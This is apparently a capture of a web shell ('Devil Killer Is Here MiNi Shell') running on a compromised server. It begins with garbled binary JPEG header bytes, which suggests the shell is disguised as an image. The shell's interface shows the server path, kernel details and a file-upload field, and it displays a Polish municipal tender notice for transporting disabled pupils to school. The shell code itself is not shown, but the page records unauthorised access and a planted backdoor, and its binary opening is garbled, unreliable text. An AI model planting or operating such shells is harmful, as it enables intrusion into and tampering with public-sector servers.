JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220808/0029681201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów niepełnosprawnych do szkół w roku szkolnym 2022/2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Zespół Edukacji w Chełmcu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120224637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Papieska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełmiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-395</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">185480224</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">18548043</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@chelmiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chelmiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów niepełnosprawnych do szkół w roku szkolnym 2022/2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-516e61e2-170f-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00296812</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017844/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz uczniów niepełnosprawnych do szkół w roku szkolnym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/chelmiec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/chelmiec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków komunikacji<br/>elektronicznej, pliki należy opatrzyć: - kwalifikowanym podpisem elektronicznym; podpisem zaufanym, -<br/>lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO: Zgodnie z art.<br/>13ust.1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia<br/>2016roku wsprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie oochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO, informuję,<br/>że:1.administratorem Pani/Pana danych osobowych jest Gmina Chełmiec, ul. Papieska 2, 33-<br/>395Chełmiec2. Pana/Pani dane nie podlegają współ administrowaniu, 3. Zamawiający powołał<br/>inspektoraochrony danych osobowych, który jest dostępny pod adresem – email: iod@chelmiec.pl 4. Pani/Pana<br/>daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym<br/>zpostępowaniem o udzielenie zamówienia publicznego nr postępowania: GZE.271.2.2022 odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty,którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1ustawy Prawo zamówień publicznych, 6. Pani/Pana dane osobowe<br/>będą przechowywane, zgodnie zart. 78 ust. 1 ustawy Pzp,przez okres 4 lat od dnia zakończenia<br/>postępowania o udzieleniezamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czastrwania umowy; 7. obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Panadotyczących jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem w niniejszym postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodaniaokreślonych danych wynikają z ustawy Pzp, 8. w odniesieniu do Pani/Pana<br/>danych osobowych decyzjenie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO, 9. posiada Pani/Pan:a) na podstawie art. 15RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących, b) napodstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych **, c) na podstawie art.18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych zzastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>***, d) prawo do wniesienia skargido Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danychosobowych Pani/Pana dotyczących narusza przepisy RODO, 10.<br/>Wykonawca składa do ofertyoświadczenie zawarte w formularzu ofertowym w zakresie wypełnienia<br/>obowiązków informacyjnychprzewidzianych wart. 13 lub art. 14 RODO. 11. W przypadku gdy<br/>Wykonawca nie przekazuje danychosobowych innych niż bezpośrednio jego dotyczących lub zachodzi<br/>wyłączenie stosowania obowiązkuinformacyjnego,stosownie do art. 13 ust.4 lub art. 14 ust. 5 RODO<br/>treści oświadczenia Wykonawca nieskłada(usunięcie treści oświadczenia np. przez jego wykreślenie).<br/>** Wyjaśnienie: skorzystanie zprawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówieniapublicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie możenaruszać integralności protokołu oraz jego załączników.***<br/>Wyjaśnienie: prawo do ograniczeniaprzetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnieniakorzystania ze środków ochrony prawnej lub w celu ochrony praw<br/>innej osoby fizycznej lub prawnej,lub z uwagi na ważne względy interesu publicznego Unii Europejskiej<br/>lub państwa członkowskiego.Klauzula informacyjna z art. 13 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3lit.b,<br/>d lub e RODO prawo do usunięcia danych osobowych, b) prawo do przenoszenia danychosobowych, o<br/>którym mowa w art. 20 RODO, c) na podstawie art. 21 RODO prawo sprzeciwu, wobecprzetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danychosobowych jest art.6 ust.<br/>1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GZE.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportu dzieci i młodzieży w zakresie dowozu i odwozu do szkół z terenu gminy Chełmiec wraz z zapewnieniem im opieki podczas transportu, we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół i placówek oraz odwóz uczniów ze szkół i placówek na wyznaczony przystanek w miejscu zamieszkania. Dowóz uczniów do szkół będzie się odbywał w godzinach porannych, odwóz uczniów ze szkół w godzinach popołudniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15.	W tym postępowaniu zamawiający przewiduje skorzystania z prawa opcji. Zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkową usługę, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, który zostanie złożony wraz z ofertą.<br/>16.	Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na zleceniu dodatkowych usług transportu uczniów do szkół w drugim semestrze roku szkolnego 2022/2023 tj. dla poszczególnych części:<br/>część 1) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni) <br/>część 2) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni)<br/>część 3) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 109 dni)<br/>część 4) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni) <br/>na takich samych warunkach jak zawartych w pierwotnej umowie. <br/><br/>17.	W przypadku skorzystania z prawa opcji wynagrodzenie płatne będzie w wysokości wynikającej z wartości dokonanej opcji, na zasadach przewidzianych w niniejszej umowie dla zamówienia podstawowego.<br/><br/>18.	Skorzystanie z prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Wykonawca nie ma roszczenia o wykonanie prawa opcji.<br/><br/>19.	Skorzystanie z prawa opcji następuje poprzez złożenie oświadczenia Zamawiającego o skorzystaniu z prawa opcji oraz poprzez zawarcie aneksu terminowego.<br/><br/>20.	Postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji.<br/><br/>21.	Wykonawca jest zobowiązany do realizacji usług w ramach prawa opcji w przypadku i w zakresie, w jakim korzysta z niego Zamawiający, zgodnie z treścią oświadczenia Zamawiającego o skorzystaniu z prawa opcji i na warunkach określonych w niniejszej umowie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-01-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Oferty zostaną ocenione na podstawie przyjętych kryteriów dla każdej z części z osobna.<br/> b) Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta uzyska najwyższą ilość punktów w przyjętych kryteriach oceny ofert dla danej części, pod warunkiem, że oferta ta nie podlega odrzuceniu oraz z zastrzeżeniem możliwości przeprowadzenia negocjacji.<br/> c) Zamawiający poprawi w tekście oferty omyłki zgodnie z art. 223 ust. 2 uPzp.<br/> d) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert, zgodnie z art. 223 ust. 1 uPzp.<br/> e) Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 226 ust. 1 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportu dzieci i młodzieży w zakresie dowozu i odwozu do szkół z terenu gminy Chełmiec wraz z zapewnieniem im opieki podczas transportu, we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół i placówek oraz odwóz uczniów ze szkół i placówek na wyznaczony przystanek w miejscu zamieszkania. Dowóz uczniów do szkół będzie się odbywał w godzinach porannych, odwóz uczniów ze szkół w godzinach popołudniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15.	W tym postępowaniu zamawiający przewiduje skorzystania z prawa opcji. Zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkową usługę, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, który zostanie złożony wraz z ofertą.<br/>16.	Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na zleceniu dodatkowych usług transportu uczniów do szkół w drugim semestrze roku szkolnego 2022/2023 tj. dla poszczególnych części:<br/>część 1) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni) <br/>część 2) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni)<br/>część 3) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 109 dni)<br/>część 4) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni) <br/>na takich samych warunkach jak zawartych w pierwotnej umowie. <br/><br/>17.	W przypadku skorzystania z prawa opcji wynagrodzenie płatne będzie w wysokości wynikającej z wartości dokonanej opcji, na zasadach przewidzianych w niniejszej umowie dla zamówienia podstawowego.<br/><br/>18.	Skorzystanie z prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Wykonawca nie ma roszczenia o wykonanie prawa opcji.<br/><br/>19.	Skorzystanie z prawa opcji następuje poprzez złożenie oświadczenia Zamawiającego o skorzystaniu z prawa opcji oraz poprzez zawarcie aneksu terminowego.<br/><br/>20.	Postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji.<br/><br/>21.	Wykonawca jest zobowiązany do realizacji usług w ramach prawa opcji w przypadku i w zakresie, w jakim korzysta z niego Zamawiający, zgodnie z treścią oświadczenia Zamawiającego o skorzystaniu z prawa opcji i na warunkach określonych w niniejszej umowie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-01-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Oferty zostaną ocenione na podstawie przyjętych kryteriów dla każdej z części z osobna.<br/> b) Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta uzyska najwyższą ilość punktów w przyjętych kryteriach oceny ofert dla danej części, pod warunkiem, że oferta ta nie podlega odrzuceniu oraz z zastrzeżeniem możliwości przeprowadzenia negocjacji.<br/> c) Zamawiający poprawi w tekście oferty omyłki zgodnie z art. 223 ust. 2 uPzp.<br/> d) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert, zgodnie z art. 223 ust. 1 uPzp.<br/> e) Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 226 ust. 1 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportu dzieci i młodzieży w zakresie dowozu i odwozu do szkół z terenu gminy Chełmiec wraz z zapewnieniem im opieki podczas transportu, we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół i placówek oraz odwóz uczniów ze szkół i placówek na wyznaczony przystanek w miejscu zamieszkania. Dowóz uczniów do szkół będzie się odbywał w godzinach porannych, odwóz uczniów ze szkół w godzinach popołudniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15.	W tym postępowaniu zamawiający przewiduje skorzystania z prawa opcji. Zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkową usługę, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, który zostanie złożony wraz z ofertą.<br/>16.	Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na zleceniu dodatkowych usług transportu uczniów do szkół w drugim semestrze roku szkolnego 2022/2023 tj. dla poszczególnych części:<br/>część 1) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni) <br/>część 2) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni)<br/>część 3) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 109 dni)<br/>część 4) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni) <br/>na takich samych warunkach jak zawartych w pierwotnej umowie. <br/><br/>17.	W przypadku skorzystania z prawa opcji wynagrodzenie płatne będzie w 